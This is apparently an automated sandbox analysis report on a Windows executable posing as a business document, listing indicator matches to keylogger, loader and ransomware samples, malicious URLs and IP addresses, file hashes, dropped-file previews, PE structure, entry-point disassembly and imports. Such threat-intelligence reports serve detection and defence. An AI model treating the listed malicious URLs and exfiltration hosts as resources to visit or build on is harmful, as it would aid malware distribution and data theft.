	Delivery_Notification_00000260791.doc.js	Get hash	malicious	Unknown	Browse	radostdetym.ru/?ad=1JXSXybzEjjRJQDbVngTy7d8kEFAxmgmDN&id=rWoA9pTQhV1o4c5fjbOa-d26BGh3QU3-Bk0PqI4WnzM-5vl4IqKPymhrqkRpunF_PTHktMR-2qUlNAtnXA&rnd=45
	ce.vbs	Get hash	malicious	Unknown	Browse	paste.ee/d/lxvbq
	Label_00000852555.doc.js	Get hash	malicious	Unknown	Browse	tamilandth.com/counter/?ad=1GNktTwWR98eDEMovFNDqyUPsyEdCxKRzC&id=LWkA9pJQhl9uXU1kaDN-eSC-55GNxzVDsLXZhtXL8Pr1j1FTCf4XAYGxA0VCjCQra2XwotFrDHGSYxM&rnd=25
	PO 20495088.exe	Get hash	malicious	FormBook	Browse	www.ssrnoremt-rise.sbs/3jsc/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	filetransfer.io/data-package/zWkbOqX7/download
	http://kklk16.bsyo45ksda.top	Get hash	malicious	Unknown	Browse	kklk16.bsyo45ksda.top/favicon.ico
	gusetup.exe	Get hash	malicious	Unknown	Browse	www.glarysoft.com/update/glary-utilities/pro/pro50/
	Online Interview Scheduling Form.lnk	Get hash	malicious	Ducktail	Browse	gmtagency.online/api/check
	View Pdf Doc_0b40e7d2137cd39647abbd9321b34da7.htm	Get hash	malicious	Unknown	Browse	f7xiz.nhgrt.top/Kbo731/96f7xiZ96?&&V5G=YW5kZXJzLmhhcnR1bmcuY2hyaXN0ZW5zZW5Acm9ja3dvb2wuY29t
132.226.247.73	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	checkip.dyndns.org/
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	checkip.dyndns.org/
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	Kayla Dennis CV.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/
	New Order_20241711.exe	Get hash	malicious	MassLogger RAT	Browse	checkip.dyndns.org/
	Pedido_335_20241112_614171.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	checkip.dyndns.org/
	JOSHHHHHH.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	checkip.dyndns.org/
	QUOTATION_NOVQTRA071244#U00faPDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	checkip.dyndns.org/

Domains

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
reallyfreegeoip.org	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.96.3
checkip.dyndns.com	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	193.122.130.0
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	193.122.6.168
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	158.101.44.242
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	158.101.44.242
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	193.122.6.168
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	193.122.130.0
api.telegram.org	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse	149.154.167.220
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	149.154.167.220
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	Ailurophile Stealer	Browse	149.154.167.220
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	P.O 423737.exe	Get hash	malicious	MassLogger RAT	Browse	149.154.167.220
CLOUDFLARENETUS	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.96.3
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	https://2kio0wi0iat.freewebhostmost.com	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	A2028041200SD.exe	Get hash	malicious	FormBook	Browse	188.114.96.3
	file.exe	Get hash	malicious	LummaC, Amadey, Credential Flusher, Cryptbot, LummaC Stealer, Stealc	Browse	188.114.97.3
	file.exe	Get hash	malicious	LummaC	Browse	188.114.97.3
	SWIFT COPY 0028_pdf.exe	Get hash	malicious	FormBook	Browse	104.21.4.93
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.96.3
HOMEPL-ASPL	byte.mpsl.elf	Get hash	malicious	Mirai, Okiru	Browse	89.161.210.233
	nabarm7.elf	Get hash	malicious	Unknown	Browse	46.242.202.122
	nklarm.elf	Get hash	malicious	Unknown	Browse	188.128.255.110
	la.bot.mipsel.elf	Get hash	malicious	Unknown	Browse	188.128.211.46
	yGktPvplJn.exe	Get hash	malicious	Pushdo	Browse	46.242.238.60
	8YxO3bxOUC.elf	Get hash	malicious	Mirai	Browse	46.41.138.57
	http://serwer2255313.home.pl/finan/finan/auth/login.php	Get hash	malicious	Unknown	Browse	46.242.239.179
	https://serwer2255313.home.pl/finan/finan/	Get hash	malicious	Unknown	Browse	46.242.239.179
	myfile.exe	Get hash	malicious	Sodinokibi, Chaos, Netwalker, Revil, TrojanRansom	Browse	46.242.240.159
	http://www.woprnaoceanie.pl/logowanie.php	Get hash	malicious	Unknown	Browse	46.242.242.216
UTMEMUS	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	132.226.247.73
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	132.226.247.73
	Xkl0PnD8zFPjfh1.wiz.rtf	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73
	Company catalog profile.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	132.226.8.169
	Quote GVSE24-00815.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	Payment_transaction.exe	Get hash	malicious	MassLogger RAT	Browse	132.226.247.73
	nowe zam#U00f3wienie.exe	Get hash	malicious	Snake Keylogger	Browse	132.226.247.73
	INQUIRY_pdf.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	132.226.247.73

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
54328bd36c14bd82ddaa0c04b25ed9ad	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	188.114.97.3
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	MB267382625AE.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	188.114.97.3
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	188.114.97.3
	e-dekont_html.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.97.3
	Benefit Enrollment -wZ5nusm.pdf	Get hash	malicious	Unknown	Browse	188.114.97.3
	REPLY TO NOTICE GST DRC-1A_pdf.exe	Get hash	malicious	Unknown	Browse	188.114.97.3
	Ref#501032.vbe	Get hash	malicious	MassLogger RAT	Browse	188.114.97.3
3b5074b1b5d032e5620f69f9f700ff0e	#U5ba2#U6237#U9000#U6b3e#U7533#U8bf7#U8868-SUPERLEON NOVIEMBR.exe	Get hash	malicious	GuLoader, Snake Keylogger	Browse	149.154.167.220
	BOQ and Full Specification.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	Request for Quotation MK FMHS.RFQ.24.11.20.bat.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	149.154.167.220
	sostener.vbs	Get hash	malicious	Remcos	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	seethebestthingswithgreatsituationshandletotheprogress.hta	Get hash	malicious	Cobalt Strike, AgentTesla, HTMLPhisher	Browse	149.154.167.220
	Quote specification and BOQ.exe	Get hash	malicious	GuLoader	Browse	149.154.167.220
	QUOTATION_NOVQTRA071244PDF.scr.exe	Get hash	malicious	Snake Keylogger	Browse	149.154.167.220
	file.exe	Get hash	malicious	LummaC	Browse	149.154.167.220
	Towered.vbs	Get hash	malicious	FormBook, GuLoader	Browse	149.154.167.220

Process:	C:\Users\user\Desktop\114117914 - Rebound Electronics.exe
File Type:	data
Category:	dropped
Size (bytes):	274944
Entropy (8bit):	6.978122878832643
Encrypted:	false
SSDEEP:	6144:Pd7W+iPXbrMXBBTTp786yWOs+g2YJpbVpVignsFJtOYS+STih4Jy8n27TDAkiDUH:PtWlToOTssTTziNUDQmu2ie
MD5:	27F756987332BFFAF097E16EE2568463
SHA1:	D6B768A82BED281B2A3C23C0017B46AEEEA29486
SHA-256:	D4CF9FB54BD1412DDACFB4FAE0A803CF20B1A272BA0670852909374EC6CF9174
SHA-512:	742F7EDB571C79AC83798B8EC82F1A2B9BEE4E08AB99BBA2423E5C099E90A59123CAD43572508BD69AD8915AF5834959BB35294FD4DF5A594CA3C89B57190F9B
Malicious:	false
Reputation:	low
Preview:	.b.PRVGN6R7B..ZO.KGCA1XIxTPQVGN2R7BAHZO8KGCA1XI8TPQVGN2R7BAH.O8KI\.?X.1.q.W...._+2h=W,5",.;(V:?%v%+. B,a!4o\|..c,^<,.Y][rGN2R7BA..O8.F@A...^TPQVGN2R.BCIQNhKG_E1X]8TPQVGP.V7BaHZOxOGCAqXI.TPQTGN6R7BAHZO<KGCA1XI8.TQVEN2R7BAJZ..KGSA1HI8TPAVG^2R7BAHJO8KGCA1XI8T.kRG.2R7B.LZX(KGCA1XI8TPQVGN2R7BA(^O4KGCA1XI8TPQVGN2R7BAHZO8KGCA1XI8TPQVGN2R7BAHZO8KGCA1Xi8TXQVGN2R7BAHZG.KG.A1XI8TPQVGN.&R:5HZO.PCCA.XI8HTQVEN2R7BAHZO8KGCA.XIXz""$$N2R RAHZ.<KGQA1XW<TPQVGN2R7BAHZ.8K.m3T4&[TP]VGN223BAJZO8{CCA1XI8TPQVGN2.7B.HZO8KGCA1XI8TPQVGu6R7BAH.O8KECD1..:T..WGM2R7.AH\o.IG.A1XI8TPQVGN2R7BAHZO8KGCA1XI8TPQVGN2R7BAHZO8.:.N..Q'..VGN2R7CCK^I0CGCA1XI8T.QVG.2R7.AHZx8KGfA1X$8TPuVGNLR7B?HZO\KGC31XIYTPQ.GN2=7BA&ZO85GCA/Za.TP[\|aN0z.BABZe.8eCA;.H8TT"uGN8.5BAL)k8KM.B1XMKqPQ\.J2R31gHZE.NGCE..I;.FWVGU]k7BKHY.-MGCZ.~I:\|jQVMN.t7A.]\O8PmaA3.@8TT{.4S2R1j.HZELBGCC.RI8PzOTo.2R=hc6QO8OlCk.&E8TTzVmlL_7BEcZe&I.NA1\c.^QVCe2x.<NHZK.Km]C.WI8Pzs(WN2V.Bkj$^8KChA.z7*TPU}Gd.,$BALqO.i9WA1\b8~r/CGN6y7hc6LO8OlCk.&^8TTzVmlLJ7BEcZe&I.[A1\c>~2Q$MX2"4

C:\Users\user\AppData\Local\Temp\autA7C0.tmp

Download File

Process:	C:\Users\user\Desktop\114117914 - Rebound Electronics.exe
File Type:	data
Category:	dropped
Size (bytes):	141798
Entropy (8bit):	7.951202430520291
Encrypted:	false
SSDEEP:	3072:E1O0NKxROVdZ7Mvf3rgCsw1U7safDPEdE0FORVzs9MO:scOV/7MvfkCxCQafDPJ0FSYf
MD5:	EC4301FA85BE88F2BB8742939F29B700
SHA1:	B0DAB7EF3B7CED970B9CBFF687DF2E2099B0DE95
SHA-256:	F1F8053EE1CD1F0676D0BF9E7D414AA734A5BFD79EFE53D89FDA6CEA96C4BFF9
SHA-512:	969D3D28873783F801599AF9C93AE3131AE91826ECE77A07293D5A6449F17B403EE8448A6EFA5BE51C836401DEB9174592DB9264AF324281EA09C682118F647C
Malicious:	false
Reputation:	low
Preview:	EA06..2..X....Z.N.T..-..O.R..:..I.U...rd..Pi..\|.._3...v...Ms.?..f9..........\.....Y..#;.U.S.-.K+.H(R...io.A".9ezy,.Vk.....c..\|..F.P}...x.s]z...Q.Z)tz..cX..9...M.V....O...5.L`.\..\`....P.T......V...]..A......Z.^...(.?..]J....`4..bP...J+.......).....8.V...G.R.....$.).....T(t:.D.\..\p..@..b.".I$.....C.9...)W..9......m..&.j.R.]..fS0..8...(~.........(X....Z..c..N...}^.M.\=..Er....`..."u..o.z..........K.Rf.0..K...@...../.....\..".P....O..J...3..+ ..D......`..j..K.V....\|.......B.Y~.-..;.R'.J...G.N:SZ...)..)t...cX...5..s.J.T.s.=".E.S..:,n.I...z...]...T.Egc-...u....:.Z.5jm:1t..w...>qP..h3>...p..&.9.Jcj..".....C..3...T..U)..6.....e....Q@...Z.l.W..-..e.Rx....c.J......2.Eg..Ej....k.=.\......Z9B.......h...SyUR.U....d..<...V..\...N/.)}.......`.....z..9.....*...X.H...".I.z(.:\fcI.T...e.a..M..9>..8..m>......K........J'rj\.....(t.u:.&...9.W8...Xc4:.g_I.W..:.....P(.X..Qm..fr8..)y.Q..K...G.....f.i..)3+..E...:U`.....Rw5j..K.U.....0.R...Ez...w.I%b.:.T.P...I..i....G....

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.96129693013498
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	114117914 - Rebound Electronics.exe
File size:	1'069'056 bytes
MD5:	f336089abf758f7bb565ebd1366e2ad2
SHA1:	3e5ee53a5014900cef867428b99d92567669bf7f
SHA256:	69e4226931e9735180c32894ac2e0604fc2c9e820781d3fc79b96451ca738072
SHA512:	96c866c68314876afe0a7fd54e6124b0899916cc456099354e217a67ffdbef6235003d34262545fc58bd29658ebb2818d07876127f30a4e120ecb197c9d97b4a
SSDEEP:	24576:Ztb20pkaCqT5TBWgNQ7ajzpeVKp/teALURW6A:qVg5tQ7ajiKp17N5
TLSH:	8C35BF1363DDC361C7B25273BA66B701AEBF782506A1F96B2FD4093DF820122525E673
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

File Icon


Icon Hash:	aaf3e3e3938382a0

Static PE Info

General

Entrypoint:	0x425f74
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x673D20D2 [Tue Nov 19 23:35:46 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	1
File Version Major:	5
File Version Minor:	1
Subsystem Version Major:	5
Subsystem Version Minor:	1
Import Hash:	3d95adbf13bbe79dc24dccb401c12091

Entrypoint Preview

Instruction
call 00007FB23CE1BC8Fh
jmp 00007FB23CE0ECA4h
int3
int3
push edi
push esi
mov esi, dword ptr [esp+10h]
mov ecx, dword ptr [esp+14h]
mov edi, dword ptr [esp+0Ch]
mov eax, ecx
mov edx, ecx
add eax, esi
cmp edi, esi
jbe 00007FB23CE0EE2Ah
cmp edi, eax
jc 00007FB23CE0F18Eh
bt dword ptr [004C0158h], 01h
jnc 00007FB23CE0EE29h
rep movsb
jmp 00007FB23CE0F13Ch
cmp ecx, 00000080h
jc 00007FB23CE0EFF4h
mov eax, edi
xor eax, esi
test eax, 0000000Fh
jne 00007FB23CE0EE30h
bt dword ptr [004BA370h], 01h
jc 00007FB23CE0F300h
bt dword ptr [004C0158h], 00000000h
jnc 00007FB23CE0EFCDh
test edi, 00000003h
jne 00007FB23CE0EFDEh
test esi, 00000003h
jne 00007FB23CE0EFBDh
bt edi, 02h
jnc 00007FB23CE0EE2Fh
mov eax, dword ptr [esi]
sub ecx, 04h
lea esi, dword ptr [esi+04h]
mov dword ptr [edi], eax
lea edi, dword ptr [edi+04h]
bt edi, 03h
jnc 00007FB23CE0EE33h
movq xmm1, qword ptr [esi]
sub ecx, 08h
lea esi, dword ptr [esi+08h]
movq qword ptr [edi], xmm1
lea edi, dword ptr [edi+08h]
test esi, 00000007h
je 00007FB23CE0EE85h
bt esi, 03h
jnc 00007FB23CE0EED8h
movdqa xmm1, dqword ptr [esi+00h]

Rich Headers

Programming Language:

[ C ] VS2008 SP1 build 30729
[IMP] VS2008 SP1 build 30729
[ASM] VS2012 UPD4 build 61030
[RES] VS2012 UPD4 build 61030
[LNK] VS2012 UPD4 build 61030

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xb7004	0x17c	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xc4000	0x3be1c	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x100000	0x6c4c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x8d8d0	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0xb2730	0x40	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8d000	0x860	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x8b54f	0x8b600	f437a6545e938612764dbb0a314376fc	False	0.5699499019058296	data	6.680413749210956	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8d000	0x2cc42	0x2ce00	827ffd24759e8e420890ecf164be989e	False	0.330464397632312	data	5.770192333189168	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xba000	0x9d54	0x6200	e0a519f8e3a35fae0d9c2cfd5a4bacfc	False	0.16402264030612246	data	2.002691099965349	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xc4000	0x3be1c	0x3c000	f8c54baeb87b8029ed3009c112da18cf	False	0.8892985026041667	data	7.804173227297431	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x100000	0xa474	0xa600	0bc98f8631ef0bde830a7f83bb06ff08	False	0.5017884036144579	data	5.245426654116355	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xc45a8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.7466216216216216
RT_ICON	0xc46d0	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors	English	Great Britain	0.3277027027027027
RT_ICON	0xc47f8	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 192	English	Great Britain	0.3885135135135135
RT_ICON	0xc4920	0x2e8	Device independent bitmap graphic, 32 x 64 x 4, image size 0	English	Great Britain	0.3333333333333333
RT_ICON	0xc4c08	0x128	Device independent bitmap graphic, 16 x 32 x 4, image size 0	English	Great Britain	0.5
RT_ICON	0xc4d30	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0	English	Great Britain	0.2835820895522388
RT_ICON	0xc5bd8	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0	English	Great Britain	0.37906137184115524
RT_ICON	0xc6480	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0	English	Great Britain	0.23699421965317918
RT_ICON	0xc69e8	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0	English	Great Britain	0.13858921161825727
RT_ICON	0xc8f90	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0	English	Great Britain	0.25070356472795496
RT_ICON	0xca038	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0	English	Great Britain	0.3173758865248227
RT_MENU	0xca4a0	0x50	data	English	Great Britain	0.9
RT_STRING	0xca4f0	0x594	data	English	Great Britain	0.3333333333333333
RT_STRING	0xcaa84	0x68a	data	English	Great Britain	0.2747909199522103
RT_STRING	0xcb110	0x490	data	English	Great Britain	0.3715753424657534
RT_STRING	0xcb5a0	0x5fc	data	English	Great Britain	0.3087467362924282
RT_STRING	0xcbb9c	0x65c	data	English	Great Britain	0.34336609336609336
RT_STRING	0xcc1f8	0x466	data	English	Great Britain	0.3605683836589698
RT_STRING	0xcc660	0x158	Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0	English	Great Britain	0.502906976744186
RT_RCDATA	0xcc7b8	0x33123	data			1.0003394092367117
RT_GROUP_ICON	0xff8dc	0x76	data	English	Great Britain	0.6610169491525424
RT_GROUP_ICON	0xff954	0x14	data	English	Great Britain	1.25
RT_GROUP_ICON	0xff968	0x14	data	English	Great Britain	1.15
RT_GROUP_ICON	0xff97c	0x14	data	English	Great Britain	1.25
RT_VERSION	0xff990	0xdc	data	English	Great Britain	0.6181818181818182
RT_MANIFEST	0xffa6c	0x3b0	ASCII text, with CRLF line terminators	English	Great Britain	0.5116525423728814

Imports

DLL	Import
WSOCK32.dll	__WSAFDIsSet, recv, send, setsockopt, ntohs, recvfrom, select, WSAStartup, htons, accept, listen, bind, closesocket, connect, WSACleanup, ioctlsocket, sendto, WSAGetLastError, inet_addr, gethostbyname, gethostname, socket
VERSION.dll	GetFileVersionInfoW, VerQueryValueW, GetFileVersionInfoSizeW
WINMM.dll	timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll	ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, ImageList_Create, InitCommonControlsEx, ImageList_ReplaceIcon
MPR.dll	WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll	InternetReadFile, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetConnectW, InternetQueryDataAvailable
PSAPI.DLL	GetProcessMemoryInfo
IPHLPAPI.DLL	IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll	UnloadUserProfile, DestroyEnvironmentBlock, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll	IsThemeActive
KERNEL32.dll	HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, FindClose, GetLongPathNameW, GetCurrentThread, FindNextFileW, MoveFileW, CopyFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, DeleteCriticalSection, WaitForSingleObject, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, GetShortPathNameW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, SetPriorityClass, LoadLibraryW, VirtualAlloc, CloseHandle, GetLastError, GetFullPathNameW, SetCurrentDirectoryW, IsDebuggerPresent, 